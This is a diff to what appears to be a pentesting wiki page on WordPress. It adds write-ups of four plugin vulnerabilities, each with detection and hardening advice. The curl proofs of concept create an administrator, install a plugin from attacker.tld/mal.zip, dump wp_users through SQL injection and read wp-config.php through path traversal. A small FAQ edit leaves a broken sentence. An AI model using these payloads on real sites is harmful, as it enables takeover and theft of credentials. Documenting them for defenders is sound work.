Add content from: Q3 2025’s most exploited WordPress vulnerabilities and how R...

src/network-services-pentesting/pentesting-web/wordpress.md

@@ -852,6 +852,135 @@ Patched behaviour (Jobmonster 4.8.0)
 
 - Removed the insecure fallback from $_POST['id']; $user_email must originate from verified provider branches in switch($_POST['using']).
 
+## Unauthenticated privilege escalation via REST token/key minting on predictable identity (OttoKit/SureTriggers ≤ 1.0.82)
+
+Some plugins expose REST endpoints that mint reusable “connection keys” or tokens without verifying the caller’s capabilities. If the route authenticates only on a guessable attribute (e.g., username) and does not bind the key to a user/session with capability checks, any unauthenticated attacker can mint a key and invoke privileged actions (admin account creation, plugin actions → RCE).
+
+- Vulnerable route (example): sure-triggers/v1/connection/create-wp-connection
+- Flaw: accepts a username, issues a connection key without current_user_can() or a strict permission_callback
+- Impact: full takeover by chaining the minted key to internal privileged actions
+
+PoC – mint a connection key and use it
+
+```bash
+# 1) Obtain key (unauthenticated). Exact payload varies per plugin
+curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/connection/create-wp-connection" \
+  -H 'Content-Type: application/json' \
+  --data '{"username":"admin"}'
+# → {"key":"<conn_key>", ...}
+
+# 2) Call privileged plugin action using the minted key (namespace/route vary per plugin)
+curl -s -X POST "https://victim.tld/wp-json/sure-triggers/v1/users" \
+  -H 'Content-Type: application/json' \
+  -H 'X-Connection-Key: <conn_key>' \
+  --data '{"username":"pwn","email":"p@t.ld","password":"p@ss","role":"administrator"}'
+```
+
+Why it’s exploitable
+- Sensitive REST route protected only by low-entropy identity proof (username) or missing permission_callback
+- No capability enforcement; minted key is accepted as a universal bypass
+
+Detection checklist
+- Grep plugin code for register_rest_route(..., [ 'permission_callback' => '__return_true' ])
+- Any route that issues tokens/keys based on request-supplied identity (username/email) without tying to an authenticated user or capability
+- Look for subsequent routes that accept the minted token/key without server-side capability checks
+
+Hardening
+- For any privileged REST route: require permission_callback that enforces current_user_can() for the required capability
+- Do not mint long-lived keys from client-supplied identity; if needed, issue short-lived, user-bound tokens post-authentication and recheck capabilities on use
+- Validate the caller’s user context (wp_set_current_user is not sufficient alone) and reject requests where !is_user_logged_in() || !current_user_can(<cap>)
+
+---
+
+## Nonce gate misuse → unauthenticated arbitrary plugin installation (FunnelKit Automations ≤ 3.5.3)
+
+Nonces prevent CSRF, not authorization. If code treats a nonce pass as a green light and then skips capability checks for privileged operations (e.g., install/activate plugins), unauthenticated attackers can meet a weak nonce requirement and reach RCE by installing a backdoored or vulnerable plugin.
+
+- Vulnerable path: plugin/install_and_activate
+- Flaw: weak nonce hash check; no current_user_can('install_plugins'|'activate_plugins') once nonce “passes”
+- Impact: full compromise via arbitrary plugin install/activation
+
+PoC (shape depends on plugin; illustrative only)
+
+```bash
+curl -i -s -X POST https://victim.tld/wp-json/<fk-namespace>/plugin/install_and_activate \
+  -H 'Content-Type: application/json' \
+  --data '{"_nonce":"<weak-pass>","slug":"hello-dolly","source":"https://attacker.tld/mal.zip"}'
+```
+
+Detection checklist
+- REST/AJAX handlers that modify plugins/themes with only wp_verify_nonce()/check_admin_referer() and no capability check
+- Any code path that sets $skip_caps = true after nonce validation
+
+Hardening
+- Always treat nonces as CSRF tokens only; enforce capability checks regardless of nonce state
+- Require current_user_can('install_plugins') and current_user_can('activate_plugins') before reaching installer code
+- Reject unauthenticated access; avoid exposing nopriv AJAX actions for privileged flows
+
+---
+
+## Unauthenticated SQLi via s search parameter in depicter-* actions (Depicter Slider ≤ 3.6.1)
+
+Multiple depicter-* actions consumed the s (search) parameter and concatenated it into SQL queries without parameterization.
+
+- Parameter: s (search)
+- Flaw: direct string concatenation in WHERE/LIKE clauses; no prepared statements/sanitization
+- Impact: database exfiltration (users, hashes), lateral movement
+
+PoC
+
+```bash
+# Replace action with the affected depicter-* handler on the target
+curl -G "https://victim.tld/wp-admin/admin-ajax.php" \
+  --data-urlencode 'action=depicter_search' \
+  --data-urlencode "s=' UNION SELECT user_login,user_pass FROM wp_users-- -"
+```
+
+Detection checklist
+- Grep for depicter-* action handlers and direct use of $_GET['s'] or $_POST['s'] in SQL
+- Review custom queries passed to $wpdb->get_results()/query() concatenating s
+
+Hardening
+- Always use $wpdb->prepare() or wpdb placeholders; reject unexpected metacharacters server-side
+- Add a strict allowlist for s and normalize to expected charset/length
+
+---
+
+## Unauthenticated Local File Inclusion via unvalidated template/file path (Kubio AI Page Builder ≤ 2.5.1)
+
+Accepting attacker-controlled paths in a template parameter without normalization/containment allows reading arbitrary local files, and sometimes code execution if includable PHP/log files are pulled into runtime.
+
+- Parameter: __kubio-site-edit-iframe-classic-template
+- Flaw: no normalization/allowlisting; traversal permitted
+- Impact: secret disclosure (wp-config.php), potential RCE in specific environments (log poisoning, includable PHP)
+
+PoC – read wp-config.php
+
+```bash
+curl -i "https://victim.tld/?__kubio-site-edit-iframe-classic-template=../../../../wp-config.php"
+```
+
+Detection checklist
+- Any handler concatenating request paths into include()/require()/read sinks without realpath() containment
+- Look for traversal patterns (../) reaching outside the intended templates directory
+
+Hardening
+- Enforce allowlisted templates; resolve with realpath() and require str_starts_with(realpath(file), realpath(allowed_base))
+- Normalize input; reject traversal sequences and absolute paths; use sanitize_file_name() only for filenames (not full paths)
+
+---
+
+### Operational detection and virtual patching tips (application layer)
+
+Until vendors ship fixes, block high-risk routes/parameters at the application layer (e.g., WAF/virtual patching engines that understand WordPress semantics):
+
+- Block unauthenticated POSTs to /wp-json/sure-triggers/v1/connection/create-wp-connection
+- Enforce capability-aware blocks on <fk-namespace>/plugin/install_and_activate for non-admin callers
+- For depicter-* actions, drop requests where s contains SQLi metas ("'", '"', '/*', '*/', '--', ';', 'or ', 'union ', 'select '), tuned per-site
+- For __kubio-site-edit-iframe-classic-template, block traversal patterns (../, ..\) and absolute paths
+
+Logging: monitor for hits to the above and alert on nonces used pre-auth or surges in depicter-* queries.
+
 ## References
 
 - [Unauthenticated Arbitrary File Deletion Vulnerability in Litho Theme](https://patchstack.com/articles/unauthenticated-arbitrary-file-delete-vulnerability-in-litho-the/)
@@ -863,7 +992,11 @@ Patched behaviour (Jobmonster 4.8.0)
 - [Hackers exploiting critical WordPress WooCommerce Payments bug](https://www.bleepingcomputer.com/news/security/hackers-exploiting-critical-wordpress-woocommerce-payments-bug/)
 - [Unpatched Privilege Escalation in Service Finder Bookings Plugin](https://patchstack.com/articles/unpatched-privilege-escalation-in-service-finder-bookings-plugin/)
 - [Service Finder Bookings privilege escalation – Patchstack DB entry](https://patchstack.com/database/wordpress/plugin/sf-booking/vulnerability/wordpress-service-finder-booking-6-0-privilege-escalation-vulnerability)
-
 - [Unauthenticated Broken Authentication Vulnerability in WordPress Jobmonster Theme](https://patchstack.com/articles/unauthenticated-broken-authentication-vulnerability-in-wordpress-jobmonster-theme/)
+- [Q3 2025’s most exploited WordPress vulnerabilities and how RapidMitigate blocked them](https://patchstack.com/articles/q3-2025s-most-exploited-wordpress-vulnerabilities-and-how-patchstacks-rapidmitigate-blocked-them/)
+- [OttoKit (SureTriggers) ≤ 1.0.82 – Privilege Escalation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/suretriggers/vulnerability/wordpress-suretriggers-1-0-82-privilege-escalation-vulnerability)
+- [FunnelKit Automations ≤ 3.5.3 – Unauthenticated arbitrary plugin installation (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/wp-marketing-automations/vulnerability/wordpress-recover-woocommerce-cart-abandonment-newsletter-email-marketing-marketing-automation-by-funnelkit-plugin-3-5-3-missing-authorization-to-unauthenticated-arbitrary-plugin-installation-vulnerability)
+- [Depicter Slider ≤ 3.6.1 – Unauthenticated SQLi via s parameter (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/depicter/vulnerability/wordpress-depicter-slider-plugin-3-6-1-unauthenticated-sql-injection-via-s-parameter-vulnerability)
+- [Kubio AI Page Builder ≤ 2.5.1 – Unauthenticated LFI (Patchstack DB)](https://patchstack.com/database/wordpress/plugin/kubio/vulnerability/wordpress-kubio-ai-page-builder-plugin-2-5-1-unauthenticated-local-file-inclusion-vulnerability)
 
 {{#include ../../banners/hacktricks-training.md}}

src/welcome/hacktricks-values-and-faq.md

@@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
 
 > [!TIP]
 >
-> - **How can I cite a page of HackTricks?**
+> - **How can I  a page of HackTricks?**
 
 As long as the link **of** the page(s) where you took the information from appears it's enough.\
 If you need a bibtex you can use something like:
@@ -144,4 +144,3 @@ This license does not grant any trademark or branding rights in relation to the
 
 {{#include ../banners/hacktricks-training.md}}
 
-